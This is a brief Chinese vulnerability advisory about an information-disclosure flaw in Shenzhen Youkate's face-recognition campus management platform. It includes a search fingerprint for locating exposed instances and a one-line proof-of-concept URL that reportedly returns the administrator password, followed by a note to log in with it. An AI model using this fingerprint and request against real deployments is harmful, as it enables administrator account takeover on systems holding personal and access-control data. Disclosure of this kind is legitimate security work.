Nx01 产品简介

        脸爱云一脸通智慧管理平台是一套功能强大，运行稳定，操作简单方便，用户界面美观，轻松统计数据的一脸通系统。无需安装，只需在后台配置即可在浏览器登录。  功能包括：系统管理中心、人员信息管理中心、设备管理中心、消费管理子系统、订餐管理子系统、水控管理子系统、电控管理子系统、考勤管理子系统、门禁通道管理子系统、会议签到管理子系统、访客管理子系统。

Nx02 漏洞描述

        深圳市优卡特电子有限公司脸爱云一脸通智慧管理平台存在信息泄露漏洞。攻击者可以访问/View/Operators/addOperators.aspx?username=admin获取管理员账号及密码。

Nx03 产品主页

web.body="View/UserReserved/UserReservedTest.aspx"

Nx04 漏洞复现

POC：

/View/Operators/addOperators.aspx?username=admin

拼接URL即可获取管理员密码。

使用获取的密码进行登录系统。

Nx05 修复建议

建议联系软件厂商进行处理。